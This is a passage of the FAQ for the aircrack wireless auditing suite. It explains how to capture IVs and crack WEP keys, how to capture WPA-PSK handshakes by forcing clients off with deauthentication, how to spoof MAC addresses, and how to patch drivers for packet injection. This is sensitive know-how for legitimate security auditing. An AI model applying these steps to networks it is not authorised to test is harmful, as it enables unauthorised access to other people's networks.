<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<HTML>
<HEAD>
  <META HTTP-EQUIV="content-type" CONTENT="text/html; charset=ISO-8859-1">
  <META NAME="author" CONTENT="Christophe Devine">
  <STYLE TYPE="text/css">
    PRE { font-family: "Courier New", Courier, monospace; }
    TD  { font-Family: Verdana, Arial, Helvetica, sans-serif; }
    P   { font-Family: Verdana, Arial, Helvetica, sans-serif; }
    A:link    { text-decoration: none; color: #0000CC; }
    A:visited { text-decoration: none; color: #0000CC; }
    A:hover   { text-decoration: underline; color: #0000FF; }
    A:active  { text-decoration: underline; color: #0000FF; }
  </STYLE>
  <TITLE>aircrack documentation</TITLE>
</HEAD>

<BODY BGCOLOR="#FFFFFF" TEXT="#000000">
<TABLE ALIGN="center" BORDER="0" CELLPADDING="16" CELLSPACING="0">
<TR VALIGN="top" BGCOLOR="#F0F0F0"><TD ALIGN="left" WIDTH="800">
<BR>

<HR NOSHADE>
<BR>
<CENTER><FONT SIZE="+2">aircrack documentation</FONT></CENTER>
<BR>
<HR NOSHADE>

<P><A NAME="q000" HREF="#q000">What is aircrack ?</A>

<BLOCKQUOTE>
aircrack is a set of tools for auditing wireless networks:

<P><UL>
  <LI><FONT FACE="Courier">airodump:</FONT> 802.11 packet capture program
  <LI><FONT FACE="Courier">aireplay:</FONT> 802.11 packet injection program
  <LI><FONT FACE="Courier">aircrack:</FONT> static WEP and WPA-PSK key cracker
  <LI><FONT FACE="Courier">airdecap:</FONT> decrypts WEP/WPA capture files
</UL>

This document has been translated in <A HREF="http://gabaon.bravehost.com/aircrack_doc_es.htm">spanish language</A> (thanks to ShaKarO).
</BLOCKQUOTE>

<P><A NAME="q018" HREF="#q018">Is there an aircrack discussion forum ?</A>

<BLOCKQUOTE>
Sure: <A HREF="http://100h.org/forums/">http://100h.org/forums/</A>. Also,
check out #aircrack on irc.freenode.net
</BLOCKQUOTE>

<P><A NAME="q010" HREF="#q010">Where to download aircrack ?</A>

<BLOCKQUOTE>
The official download location is <A HREF="http://www.cr0.net:8040/code/network/">
http://www.cr0.net:8040/code/network/</A>. However, if you can't access port 8040
for some reason, you may use this mirror instead:
<A HREF="http://100h.org/wlan/aircrack/">http://100h.org/wlan/aircrack/</A>.

<P>Aircrack is included in the <A HREF="http://troppix.net/">Troppix
LiveCD</A>, which features {&nbsp;Prism2 / PrismGT / Realtek / Atheros /
Ralink&nbsp;} drivers patched for packet injection, as well as the acx100,
ipw2200 (Centrino) and zd1211 drivers.
</BLOCKQUOTE>

<P><A NAME="q070" HREF="#q070">It says "cygwin1.dll not found" when I start aircrack.exe.</A>

<BLOCKQUOTE>
You can download this library from:
<A HREF="http://100h.org/wlan/aircrack/">http://100h.org/wlan/aircrack/</A>.

<P>To use aircrack, drag&amp;drop your .cap or .ivs capture file(s) over
aircrack.exe. If you want to pass options to the program you'll have to
start a shell (cmd.exe) and manually type the command line; there is also
a <A HREF="http://www.subagora.com/subagora/WinAircrack/download/WinAircrackPack.zip">GUI for aircrack</A>, developed by <A HREF="http://www.hexanium.com/hexatronic/other/sniff_linksys/index.htm">hexanium</A>.

<P>Example:
<P><PRE>C:\TEMP&gt; aircrack.exe -n 64 -f 8 out1.cap out2.cap ...</PRE>

<P>See below for <A HREF="#q110">a list of options</A>.
</BLOCKQUOTE>

<P><A NAME="q030" HREF="#q030">How do I crack a static WEP key ?</A>

<BLOCKQUOTE>
The basic idea is to capture as much encrypted traffic as possible using
airodump. Each WEP data packet has an associated 3-byte Initialization
Vector (IV): after a sufficient number of data packets have been collected,
run aircrack on the resulting capture file. aircrack will then perform
a set of statistical attacks developped by
<A HREF="http://www.netstumbler.org/showthread.php?postid=89036#post89036">
a talented hacker named <B>KoreK</B></A>.
</BLOCKQUOTE>

<P><A NAME="q038" HREF="#q038">How do I know my WEP key is correct ?</A>

<BLOCKQUOTE>
There are two authentication modes for WEP:

<P>
<UL><LI>Open-System Authentication: this is the default mode. All clients are
accepted by the AP, and the key is <B>never checked</B>: association is always
granted. However if your key is incorrect you won't be able to receive or send
packets (because decryption will fail), so DHCP, ping etc. will timeout.
<P><LI>Shared-Key Authentication: the client has to encrypt a challenge before
association is granted by the AP. This mode is flawed and leads to keystream
recovery, so it's never enabled by default.
</UL>

<P>In summary, just because you seem to have successfully connected to the
access point doesn't mean your WEP key is correct ! To check your WEP key,
try to decrypt a capture file with the airdecap program.
</BLOCKQUOTE>

<P><A NAME="q040" HREF="#q040">How many IVs are required to crack WEP ?</A>

<BLOCKQUOTE>
WEP cracking is not an exact science. The number of required IVs depends on
the WEP key length, and it also depends on your luck. Usually, 40-bit WEP can
be cracked with 300.000 IVs, and 104-bit WEP can be cracked with 1.000.000
IVs; <B>if you're out of luck you may need two million IVs, or more.</B>

<P>There's no way to know the WEP key length: this information is kept
hidden and never announced, either in management or data packets; as a
consequence, airodump can not report the WEP key length. Thus, it is
recommended to run aircrack twice: when you have 250.000 IVs, start aircrack
with "-n 64" to crack 40-bit WEP. Then if the key isn't found, restart
aircrack (without the -n option) to crack 104-bit WEP.
</BLOCKQUOTE>

<P><A NAME="q050" HREF="#q050">I can't seem to capture any IVs !</A>

<BLOCKQUOTE>
Possible reasons:
<P><UL>
  <LI>You are standing too far from the access point.
  <LI>There is no traffic on the target wireless network.
  <LI>There is some G traffic but you're capturing in B mode.
  <LI>Something is wrong with your card (firmware problem ?)
</UL>
<P>By the way, beacons are just unencrypted announcement packets.
They're totally useless for WEP cracking.
</BLOCKQUOTE>

<P><A NAME="q055" HREF="#q055">I've been unable to crack this AP !</A>

<BLOCKQUOTE>Shit happens.</BLOCKQUOTE>

<P><A NAME="q060" HREF="#q060">Why is there no Windows version of aireplay ?</A>

<BLOCKQUOTE>

The PEEK driver doesn't support 802.11 packet injection; I will <B>not</B>
port aireplay on Win32. However, there are commercial alternatives:

<P>Prism cards: <A HREF="http://www.tuca-software.com/transmit.php">http://www.tuca-software.com/transmit.php</A>

<P>Atheros cards: <A HREF="http://www.tamos.com/htmlhelp/commwifi/pgen.htm">http://www.tamos.com/htmlhelp/commwifi/pgen.htm</A>
</BLOCKQUOTE>

<P><A NAME="q080" HREF="#q080">Is my card compatible with airodump / 
aireplay ?</A>

<BLOCKQUOTE>
First of all, search Google to find which chipset your card has. For example,
if you have a Linksys WPC54G search for
"<A HREF="http://www.google.com/search?q=wpc54g+chipset+linux">wpc54g chipset linux</A>".

<P>
<CENTER><TABLE BORDER="2" CELLPADDING="4" CELLSPACING="0" WIDTH="92%">
<TR>
  <TH>Chipset</TH>
  <TH>Supported by airodump for Windows ?</TH>
  <TH>Supported by airodump for Linux ?</TH>
  <TH>Supported by aireplay for Linux ?</TH>
</TR>
<TR>
  <TD>HermesI</TD>
  <TD>YES (<A HREF="http://100h.org/wlan/winxp/Agere-HermesI.zip">Agere driver</A>)
  <TD>YES (<A HREF="http://100h.org/wlan/linux/hermes/">patched orinoco driver</A>)
  <TD>NO (firmware corrupts the MAC header)</TD>
</TR>
<TR>
  <TD>Prism2/3</TD>
  <TD>NO, but see <A HREF="http://100h.org/wlan/winxp/LinkFerret.zip">LinkFerret</A> for an alternative</TD>
  <TD>YES (<A HREF="http://100h.org/wlan/linux/prism2/">HostAP or wlan-ng driver</A>), <B>STA firmware 1.5.6 or newer required</B></TD>
  <TD>YES (PCI and CardBus only, driver patching required)</TD>
</TR>
<TR>
  <TD>PrismGT</TD>
  <TD>YES (<A HREF="http://500brabus.byethost22.com/driver.htm">PrismGT driver</A>)</TD>
  <TD>FullMAC: YES (<A HREF="http://100h.org/wlan/linux/prismgt/">prism54 driver</A>, SoftMAC: NOT YET (<A HREF="http://jbnote.free.fr/prism54usb/">prism54usb</A>)
  <TD>YES (driver patching recommended)</TD>
</TR>
<TR>
  <TD>Atheros</TD>
  <TD>CardBus: YES (<A HREF="http://100h.org/wlan/winxp/Atheros3.0.zip">Atheros driver</A>), PCI: NO (see <A HREF="http://www.tamos.com/products/commwifi/">CommView WiFi</A> instead)</TD>
  <TD>YES (PCI and CardBus only, <A HREF="http://100h.org/wlan/linux/atheros/">madwifi driver</A>)</TD>
  <TD>YES (driver patching required)</TD>
</TR>
<TR>
  <TD>RTL8180</TD>
  <TD>YES (<A HREF="http://100h.org/wlan/winxp/Realtek-8180-Driver.zip">Realtek driver</A>)</TD>
  <TD>YES (<A HREF="http://100h.org/wlan/linux/rtl8180/">rtl8180-sa2400 driver</A>)</TD>
  <TD>UNSTABLE (driver patching required)</TD>
</TR>
<TR>
  <TD>Aironet</TD>
  <TD>YES? (<A HREF="http://100h.org/wlan/winxp/CiscoPCX500.zip">Cisco driver</A>)</TD>
  <TD>YES (<A HREF="http://100h.org/wlan/linux/aironet/">airo driver</A>, <A HREF="http://www.cisco.com/pcgi-bin/Software/WLAN/wlplanner.cgi?this_step=5&amp;business_process=1&amp;business_process_text=Client%20Adapter&amp;Model_Number=64&amp;Model_Number_text=340%20Series%20%28802.11b%29&amp;Adapter_Type=165&amp;Adapter_Type_text=Laptop%20PC%2FPDA%20Card%20%28PCM%2FCardBus%29&amp;Operating_System=70&amp;Operating_System_text=Windows%20XP&amp;Software_Release=283&amp;Software_Release_text=2002-09.%20%20Release%202.1%3A%20802.11b%20Radio%20Firmware%204.25.30%2C%20Windows%20NDIS%20Driver%208.2.3%2C%20Aironet%20Client%20Utility%20%28ACU%29%205.05.001.%20">firmware 4.25.30 recommended</A>)</TD>
  <TD>NO (firmware issue)</TD>
</TR>
<TR>
  <TD>Ralink</TD>
  <TD>NO</TD>
  <TD>YES (<A HREF="http://100h.org/wlan/linux/ralink/">rt2500 / rt2570 driver</A>)</TD>
  <TD>YES (driver patching required)</TD>
</TR>
<TR>
  <TD>Centrino&nbsp;b</TD>
  <TD>NO</TD>
  <TD><B>PARTIAL</B>: the <A HREF="http://100h.org/wlan/linux/centrino/">ipw2100 driver</A> doesn't discard corrupted packets</TD>
  <TD>NO</TD>
</TR>
<TR>
  <TD>Centrino&nbsp;b/g</TD>
  <TD>NO</TD>
  <TD>YES (<A HREF="http://100h.org/wlan/linux/centrino/">ipw2200 driver</A>, <B>1.0.6 recommended</B>)</TD>
  <TD>NO (firmware drops packets)</TD>
</TR>
<TR>
  <TD>Broadcom</TD>
  <TD>Old models only (<A HREF="http://100h.org/wlan/winxp/Broadcom340.zip">BRCM driver</A>)</TD>
  <TD>NOT YET (<A HREF="http://bcm43xx.berlios.de/">bcm43xx driver</A>, Linux &gt;= 2.6.14 required)</TD>
  <TD>NO</TD>
</TR>
<TR>
  <TD>TI (ACX100 / ACX111)</TD>
  <TD>NO</TD>
  <TD>UNTESTED (<A HREF="http://100h.org/wlan/linux/acx100/">acx100 driver</A>)</TD>
  <TD>NO</TD>
</TR>
<TR>
  <TD>ZyDAS 1201</TD>
  <TD>NO</TD>
  <TD>YES (<A HREF="http://100h.org/wlan/linux/zd1211/">zd1211 driver</A>)
  <TD>NO</TD>
</TR>
<TR>
  <TD>Others (Marvel...)</TD>
  <TD>NO</TD>
  <TD>UNKNOWN</TD>
  <TD>NO</TD>
</TR>
</TABLE></CENTER>
</BLOCKQUOTE>

<P><A NAME="q087" HREF="#q087">The PEEK driver does not recognize my card.</A>

<BLOCKQUOTE>
Some cards are not recognized by the Windows drivers above, even
though they have the correct chipset. In this case, open the hardware
manager, select your card, "Update the driver", select "Install from a
specific location", select "Don't search, I will choose the driver to
install", click "Have disk", set the path to where the driver has been
unzipped, uncheck "Show compatible hardware", and finally choose the driver.
</BLOCKQUOTE>

<P><A NAME="q088" HREF="#q088">I have a Prism2 card, but airodump / aireplay doesn't seem to work !</A>

<BLOCKQUOTE>
First step, make sure you aren't using the orinoco driver. If the interface
name is wlan0, then the driver is HostAP or wlan-ng. However if the interface
name is eth0 or eth1, then the driver is orinoco and you must disable the
driver (use cardctl ident to know you card identifier, then edit
/etc/pcmcia/config, replace orinoco_cs with hostap_cs and restart cardmgr).

<P>Also, it can be a firmware problem. Old firmwares have trouble with test
mode 0x0A (used by the HostAP / wlan-ng injection patches), so make sure yours
is up to date -- see below for instructions. The recommended station firmware
version is 1.7.4. If it doesn't work well (kismet or airodump stalls after
capturing a couple of packets), try STA 1.5.6 instead (either s1010506.hex
for old Prism2 cards, or sf010506.hex for newer ones).

<P>On a side note, test mode 0x0A is somewhat unstable with wlan-ng. If the
card seems stuck, you will have to reset it, or use HostAP instead. Injection
is currently broken on Prism2 USB devices w/ wlan-ng.

<P>Note: a Windows XP driver for Prism2 cards with WPA/TKIP support can
be found here: <A HREF="http://100h.org/wlan/winxp/wpc11v3.0_wpa_dr.exe">
http://100h.org/wlan/winxp/wpc11v3.0_wpa_dr.exe</A>.

</BLOCKQUOTE>

<P><A NAME="q089" HREF="#q089">I have an Atheros card, and the madwifi patch
crashes the kernel / <BR>aireplay keeps saying enhanced RTC support isn't
available.</A>

<BLOCKQUOTE>
There are quite a few problems with some versions of the Linux 2.6 branch
(especially before 2.6.11 was released) that will cause a kernel panic
when injecting with madwifi. Also, on many 2.6 kernels enhanced RTC support
is just broken. Thus, is it highly recommended to use either Linux 2.6.11.x
or newer.
</BLOCKQUOTE>

<P><A NAME="q090" HREF="#q090">How do I update my Prism2 firmware ?</A>

<BLOCKQUOTE>
The simplest is to upgrade the firmware with WinUpdate - this requires
to have the WPC11 driver v2.5 installed. Both can be found at:
<A HREF="http://100h.org/wlan/linux/prism2/">http://100h.org/wlan/linux/prism2/</A>.

<P>You may also update the firmware with patched HostAP (see below for
instructions on how to <A HREF="#q180">patch and install HostAP</A>).
Alternatively, you may boot the <A HREF="http://troppix.net/">Troppix
Live CD</A> (which already has a patched hostap driver and the prism2_srec
utility).

<P>Now that HostAP is loaded, you can check your firmware's primary
and station version with this command:
<P><PRE># dmesg | grep wifi
hostap_cs: Registered netdevice wifi0
wifi0: NIC: id=0x800c v1.0.0
wifi0: PRI: id=0x15 v1.1.1 &nbsp;<I>(primary firmware is 1.1.1)</I>
wifi0: STA: id=0x1f v1.7.4 &nbsp;<I>(station firmware is 1.7.4)</I>
wifi0: registered netdevice wlan0</PRE>

<P>If the NIC id above is between 0x8002 and 0x8008, you have an old Prism2
and <B>MUST</B> use STA firmware version 1.5.6 (s1010506.hex). Otherwise,
you should use PRI 1.1.1 / STA 1.7.4 which is the most stable firmware
version for newer Prism2 cards. Do NOT use firmware 1.7.1 or 1.8.x, people
have reported having trouble with them.

<P>To update the firmware, you'll need prism2_srec from the hostap-utils
package; if it's not present on your system, download and compile hostap-utils:

<P><PRE>wget http://100h.org/wlan/linux/prism2/hostap-utils-0.4.0.tar.gz
tar -xvzf hostap-utils-0.4.0.tar.gz
cd hostap-utils-0.4.0
make</PRE>

<P>Some Prism2 cards have been restricted to a certain set of channels
because of country regulation. You can activate all 14 channels with the
following commands:

<P><PRE>./prism2_srec wlan0 -D &gt; pda; cp pda pda.bak
<I>Edit pda and put 3FFF at offset 0104 (line 24)</I></PRE>

<P>Finally, download the firmware and flash your card. If the NIC id is
between 0x8002 and 0x8008:

<P><PRE>wget http://100h.org/wlan/linux/prism2/s1010506.hex
./prism2_srec -v -f wlan0 s1010506.hex -P pda</PRE>

<P>Otherwise:

<P><PRE>wget http://100h.org/wlan/linux/prism2/pk010101.hex
wget http://100h.org/wlan/linux/prism2/sf010704.hex
./prism2_srec -v -f wlan0 pk010101.hex sf010704.hex -P pda</PRE>

<P>If you get the message
"<FONT FACE="Courier">ioctl[PRISM2_IOCTL_HOSTAPD]: Operation not supported</FONT>",
the HostAP driver is not loaded and you must install it. If you get the message
"<FONT FACE="Courier">ioctl[PRISM2_IOCTL_DOWNLOAD]: Operation not supported</FONT>",
then your HostAP driver has not been patched for non-volatile download support.

</BLOCKQUOTE>

<P><A NAME="q0A0" HREF="#q0A0">Which is the best card to buy ?</A>

<BLOCKQUOTE>
The best chipset nowadays is Atheros; it is very well supported under Linux,
and also under Windows (PCMCIA/CardBus only). The latest madwifi patch makes
it possible to inject raw 802.11 packets either in Managed and Monitor mode
at arbitrary b/g speeds.

<P>Ralink makes some nice b/g chipsets, and has been <B>very</B> cooperative
with the open-source community to release GPL drivers. Packet injection is
now fully supported under Linux on PCI/CardBus RT2500 cards, and also works
on USB RT2570 devices.

<P>Here's a list of recommended cards:

<P><CENTER><TABLE BORDER="2" CELLPADDING="4" CELLSPACING="0" WIDTH="80%">
<TR><TH>Card name</TH><TH>Type</TH><TH>Chipset</TH><TH>Antenna</TH><TH>Price</TH><TH>Windows support</TH><TH>Linux support</TH></TR>
<TR><TD>MSI PC54G2</TD><TD>PCI</TD><TD>Ralink</TD><TD>RP-SMA</TD><TD>E30</TD><TD>No</TD><TD>Yes</TD></TR>
<TR><TD>MSI CB54G2</TD><TD>CardBus</TD><TD>Ralink</TD><TD>Internal</TD><TD>E30</TD><TD>No</TD><TD>Yes</TD></TR>
<TR><TD>Linksys WMP54G <B>v4</B></TD><TD>PCI</TD><TD>Ralink</TD><TD>RP-SMA</TD><TD>E40</TD><TD>No</TD><TD>Yes</TD></TR>
<TR><TD>Linksys WUSB54G <B>v4</B></TD><TD>USB</TD><TD>Ralink</TD><TD>Internal</TD><TD>E40</TD><TD>No</TD><TD>Yes</TD></TR>
<TR><TD>D-Link DWL-G122</TD><TD>USB</TD><TD>Ralink</TD><TD>Internal</TD><TD>E45</TD><TD>No</TD><TD>Yes</TD></TR>
<TR><TD>Netgear WG111</TD><TD>USB</TD><TD>PrismGT SoftMAC</TD><TD>Internal</TD><TD>E40</TD><TD>airodump</TD><TD>No</TD></TR>
<TR><TD>Netgear WG311T</TD><TD>PCI</TD><TD>Atheros</TD><TD>RP-SMA</TD><TD>E50</TD><TD>CommView WiFi</TD><TD>Yes</TD></TR>
<TR><TD>Netgear WG511T</TD><TD>CardBus</TD><TD>Atheros</TD><TD>Internal</TD><TD>E50</TD><TD>airodump</TD><TD>Yes</TD></TR>
<TR><TD>Netgear WAG511</TD><TD>CardBus</TD><TD>Atheros</TD><TD>Internal</TD><TD>E100</TD><TD>airodump</TD><TD>Yes</TD></TR>
<TR><TD>Proxim 8470-WD</TD><TD>CardBus</TD><TD>Atheros</TD><TD><B>MC + Int.</B></TD><TD>E110</TD><TD>airodump</TD><TD>Yes</TD></TR>
</TABLE></CENTER>

<P><I>Note: there are some cheaper models with a similar name (WG511, WG311 and
DWL-G520+); those cards are <B>not</B> Atheros-based.</I> Also,
the Peek driver does not support recent Atheros cards, so you'll have
to use <A HREF="http://www.tamos.com/products/commwifi/">
CommView WiFi</A> instead.
</BLOCKQUOTE>

<P><A NAME="q0B0" HREF="#q0B0">How do I use airodump for Windows ?</A>

<BLOCKQUOTE>
First of all, make sure that your card is compatible (<A HREF="#q080">see
table above</A>) and that you have installed the proper driver.
<P>When running airodump, you should specify:
<P><UL>
  <LI>The network interface index number, which must be picked in the
      list displayed by airodump.
  <LI>The network interface type ('o' for HermesI and Realtek, 'a' for
      Aironet, Atheros, Broadcom and PrismGT).
  <LI>The channel number, between 1 and 14. You can also specify 0 to hop
      between all channels.
  <LI>The output prefix. For example, if the prefix is "foo", then airodump
      will create foo.cap (captured packets) and foo.txt (CSV statistics).
      If foo.cap already exists, airodump will resume the capture session
      by appending the packets to it.
  <LI>The "only IVs" flag. Specify 1 if you just want to save the IVs from
      WEP data packets. This saves space, but the resulting file (foo.ivs)
      will only be useful for WEP cracking.
</UL>
<P>To stop capturing packets, press Ctrl-C. You may get a blue screen,
this is due to a bug in the PEEK driver not cleanly exiting monitor mode.
Also, the capture file may be empty. The cause of this bug is unknown.
</BLOCKQUOTE>

<P><A NAME="q0C0" HREF="#q0C0">Why can't I compile airodump and aireplay on BSD / Mac OS X ?</A>

<BLOCKQUOTE>
Both airodump and aireplay sources are linux-specific. There are no plans
to port them on any other operating system.
</BLOCKQUOTE>

<P><A NAME="q0D0" HREF="#q0D0">How do I use airodump for Linux ?</A>

<BLOCKQUOTE>
Before running airodump, you may start the <FONT FACE="Courier">airmon.sh
</FONT> script to list the detected wireless interfaces. It is possible,
but not recommended, to run Kismet and airodump at the same time.

<P><PRE>  usage: airodump &lt;interface&gt; &lt;output prefix&gt; [channel] [IVs flag]

  Specify 0 as the channel to hop between 2.4 GHz channels.
  Set the optional IVs flag to 1 to only save the captured
  IVs - the resulting file is only useful for WEP cracking.

  If the gpsd daemon is running, airodump will retrieve and
  save the current GPS coordinates in text format.</PRE>

<P>You can convert a .cap / .dump file to .ivs format
with the pcap2ivs program (linux only).
</BLOCKQUOTE>

<P><A NAME="q0D8" HREF="#q0D8">airodump keeps switching between WEP and WPA.</A>

<BLOCKQUOTE>
This is happening because your driver doesn't discard corrupted packets
(that have an invalid CRC). If it's a Centrino b, it just can't be
helped; go buy a better card. If it's a Prism2, try upgrading the firmware.
</BLOCKQUOTE>

<P><A NAME="q0E0" HREF="#q0E0">What's the meaning of the fields displayed by
airodump ?</A>

<BLOCKQUOTE>
airodump will display a list of detected access points, and also a list
of connected clients ("stations"). Here's an example screenshot using
a Prism2 card with HostAP:

<P><CENTER><TABLE BORDER="3" CELLPADDING="4" CELLSPACING="0">
<TR><TD><PRE> BSSID              PWR  Beacons   # Data  CH  MB  ENC   ESSID

 00:13:10:30:24:9C   46       15     3416   6  54. WEP   the ssid 
 00:09:5B:1F:44:10   36       54        0  11  11  OPN   NETGEAR

 BSSID              STATION            PWR  Packets  Probes

 00:13:10:30:24:9C  00:09:5B:EB:C5:2B   48      719  the ssid
 00:13:10:30:24:9C  00:02:2D:C1:5D:1F  190       17  the ssid</PRE>
</TD></TR></TABLE></CENTER>

<P><CENTER><TABLE BORDER="2" CELLPADDING="4" CELLSPACING="0" WIDTH="92%">
<TR><TH>Field</TH><TH>Description</TH></TR>
<TR><TD>BSSID</TD><TD>MAC address of the access point.</TD></TR>
<TR><TD>PWR</TD><TD>Signal level reported by the card. Its signification
depends on the driver, but as the signal gets higher you get
closer to the AP or the station. If PWR == -1, the driver doesn't
support signal level reporting.</TD></TR>
<TR><TD>Beacons</TD><TD>Number of announcements packets sent by the AP.
Each access point sends about ten beacons per second at the lowest rate
(1M), so they can usually be picked up from very far.</TD></TR>
<TR><TD>#&nbsp;Data</TD><TD>Number of captured data packets (if WEP,
unique IV count), including data broadcast packets.</TD></TR>
<TR><TD>CH</TD><TD>Channel number (taken from beacon packets). Note:
sometimes packets from other channels are captured even if airodump is not
hopping, because of radio interference.</TD></TR>
<TR><TD>MB</TD><TD>Maximum speed supported by the AP. If MB = 11, it's 
802.11b, if MB = 22 it's 802.11b+ and higher rates are 802.11g. The
dot (after 54 above) indicates short preamble is supported.</TD></TR>
<TR><TD>ENC</TD><TD>Encryption algorithm in use. OPN = no encryption,
"WEP?" = WEP or higher (not enough data to choose between WEP and WPA),
WEP (without the question mark) indicates static or dynamic WEP, and WPA
if TKIP or CCMP is present.</TD></TR>
<TR><TD>ESSID</TD><TD>The so-called "SSID", which can be empty if SSID
hiding is activated. In this case, airodump will try to recover the SSID
from probe responses and association requests.</TD></TR>
<TR><TD>STATION</TD><TD>MAC address of each associated station. In the
screenshot above, two clients have been detected (00:09:5B:EB:C5:2B and
00:02:2D:C1:5D:1F).</TD></TR>
</TABLE></CENTER>
</BLOCKQUOTE>

<P><A NAME="q0F0" HREF="#q0F0">How do I merge multiple capture files ?</A>

<BLOCKQUOTE>
You may use the <FONT FACE="Courier">mergecap</FONT> program
(part of the ethereal-common package or the win32 distribution):
<P><FONT FACE="Courier">mergecap -w out.cap test1.cap test2.cap test3.cap</FONT>
<P>.ivs files can be merged with the "mergeivs" program (linux only).
</BLOCKQUOTE>

<P><A NAME="q100" HREF="#q100">Can I use Ethereal to capture 802.11 packets ?</A>

<BLOCKQUOTE>
Under Linux, simply setup the card in monitor mode with the
<FONT FACE="Courier">airmon.sh</FONT> script. Under Windows,
Ethereal can NOT capture 802.11 packets.
</BLOCKQUOTE>

<P><A NAME="q101" HREF="#q101">Can Ethereal decode WEP data packets ?</A>

<BLOCKQUOTE>
Yes. Go to Edit -&gt; Preferences -&gt; Protocols -&gt; IEEE 802.11, select
1 in the "WEP key count" and enter your WEP key below.
</BLOCKQUOTE>

<P><A NAME="q108" HREF="#q108">How do I change my card's MAC address ?</A>

<BLOCKQUOTE>
Under linux: for example, if you have an Atheros card:
<P><PRE>ifconfig ath0 down
ifconfig ath0 hw ether 00:11:22:33:44:55
ifconfig ath0 up</PRE>
<P>Under Windows, you may use <A HREF="http://www.gorlani.com/publicprj/macmakeup/macmakeup.asp">macmakeup</A>.
</BLOCKQUOTE>

<P><A NAME="q110" HREF="#q110">How do I use aircrack ?</A>

<BLOCKQUOTE>
Usage: <FONT FACE="Courier">aircrack [options] &lt;capture file(s)&gt;</FONT>
<P>You can specify multiple input files (either in .cap or .ivs format).
Also, you can run both airodump and aircrack at the same time: aircrack will
auto-update when new IVs are available.
<P>Here's a summary of all available options:
<P><CENTER><TABLE BORDER="2" CELLPADDING="4" CELLSPACING="0" WIDTH="92%">
<TR><TH>Option</TH><TH>Param.</TH><TH>Description</TH></TR>
<TR><TD>-a</TD><TD>amode</TD><TD>Force attack mode (1 = static WEP, 2 = WPA-PSK).</TD></TR>
<TR><TD>-e</TD><TD>essid</TD><TD>If set, all IVs from networks with the same ESSID will be used. This option is also required for WPA-PSK cracking if the ESSID is not broadcasted (hidden).</TD></TR>
<TR><TD>-b</TD><TD>bssid</TD><TD>Select the target network based on the access point's MAC address.</TD></TR>
<TR><TD>-p</TD><TD>nbcpu</TD><TD>On SMP systems, set this option to the number of CPUs.</TD></TR>
<TR><TD>-q</TD><TD><I>none</I></TD><TD>Enable quiet mode (no status output until the key is found, or not).</TD></TR>
<TR><TD>-c</TD><TD><I>none</I></TD><TD>(WEP cracking) Restrict the search space to alpha-numeric characters only (0x20 - 0x7F).</TD></TR>
<TR><TD>-t</TD><TD><I>none</I></TD><TD>(WEP cracking) Restrict the search space to binary coded decimal hex characters.</TD></TR>
<TR><TD>-d</TD><TD>start</TD><TD>(WEP cracking) Set the beginning the WEP key (in hex), for debugging purposes.</TD></TR>
<TR><TD>-m</TD><TD>maddr</TD><TD>(WEP cracking) MAC address to filter WEP data packets. Alternatively, specify -m ff:ff:ff:ff:ff:ff to use all and every IVs, regardless of the network.</TD></TR>
<TR><TD>-n</TD><TD>nbits</TD><TD>(WEP cracking) Specify the length of the key: 64 for 40-bit WEP, 128 for 104-bit WEP, etc. The default value is 128.</TD></TR>
<TR><TD>-i</TD><TD>index</TD><TD>(WEP cracking) Only keep the IVs that have this key index (1 to 4). The default behaviour is to ignore the key index.</TD></TR>
<TR><TD>-f</TD><TD>fudge</TD><TD>(WEP cracking) By default, this parameter is set to 2 for 104-bit WEP and to 5 for 40-bit WEP. Specify a higher value to increase the bruteforce level: cracking will take more time, but with a higher likelyhood of success.</TD></TR>
<TR><TD>-k</TD><TD>korek</TD><TD>(WEP cracking) There are 17 korek statistical attacks. Sometimes one attack creates a huge false positive that prevents the key from being found, even with lots of IVs. Try -k 1, -k 2, ... -k 17 to disable each attack selectively.</TD></TR>
<TR><TD>-x</TD><TD><I>none</I></TD><TD>(WEP cracking) Enable bruteforcing of the last two keybytes.</TD></TR>
<TR><TD>-y</TD><TD><I>none</I></TD><TD>(WEP cracking) This is an experimental single bruteforce attack which should only be used when the standard attack mode fails with more than one million IVs.</TD></TR>
<TR><TD>-w</TD><TD>words</TD><TD>(WPA cracking) Path to a wordlist.</TD></TR>
</TABLE></CENTER>
</BLOCKQUOTE>

<P><A NAME="q120" HREF="#q120">Could you implement a resume option in aircrack ?</A>

<BLOCKQUOTE>
There are no plans to implement this feature.
</BLOCKQUOTE>

<P><A NAME="q130" HREF="#q130">How can I crack a WPA-PSK network ?</A>

<BLOCKQUOTE>
You must sniff until a handshake takes place between a wireless client and
the access point. To force the client to reauthenticate, you can start a
deauth attack with aireplay. Also, a good dictionary is required; see<BR>
<A HREF="http://ftp.se.kde.org/pub/security/tools/net/Openwall/wordlists/">
http://ftp.se.kde.org/pub/security/tools/net/Openwall/wordlists/</A>
<P>FYI, it's not possible to pre-compute large tables of Pairwise Master
Keys like rainbowcrack does, since the passphrase is salted with the ESSID.
</BLOCKQUOTE>

<P><A NAME="q138" HREF="#q138">Will WPA be cracked in the future ?</A>

<BLOCKQUOTE>
It's extremely unlikely that WPA will be cracked just like WEP was.

<P>The major problem with WEP is that the shared key is appended to the IV;
the result is directly used to feed RC4. This overly simple construction
is prone to a statistical attack, since the first ciphertext bytes are
strongly correlated with the shared key (<A HREF="http://groups-beta.google.com/group/sci.crypt.research/msg/078aa9249d76eacc?dmode=source">see Andrew Roos' paper</A>).

There are basically two counter-measures against this attack: 1. mix the IV
and the shared key using a hash function or 2. discard the first 256 bytes of
RC4's output.

<P>There has been some disinformation in the news about the "flaws" of TKIP:

<BLOCKQUOTE>
<I>For now, TKIP is reasonably secure but it is also living on borrowed time
since it still relies on the same RC4 algorithm that WEP relied on.</I>
</BLOCKQUOTE>

<P>Actually, TKIP (WPA1) is <B>not</B> vulnerable: for each packet, the 48-bit
IV is mixed with the 128-bit pairwise temporal key to create a 104-bit RC4 key,
so there's no statistical correlation <U>at all</U>. Furthermore, WPA provides
counter-measures against active attacks (traffic reinjection), includes a
stronger message integrity code (michael), and has a very robust authentication
protocol (the 4-way handshake). The only vulnerability so far is a dictionnary
attack, which fails if the passphrase is robust enough.

<P>WPA2 (aka 802.11i) is exactly the same as WPA1, except that CCMP (AES in
counter mode) is used instead of RC4 and HMAC-SHA1 is used instead of HMAC-MD5
for the EAPOL MIC. Bottom line, WPA2 is a bit better than WPA1, but neither
are going to be cracked in the near future.
</BLOCKQUOTE>

<P><A NAME="q140" HREF="#q140">I have more than one million IVs, but
aircrack doesn't find the key !</A>

<BLOCKQUOTE>
Possible reasons:
<P><UL>
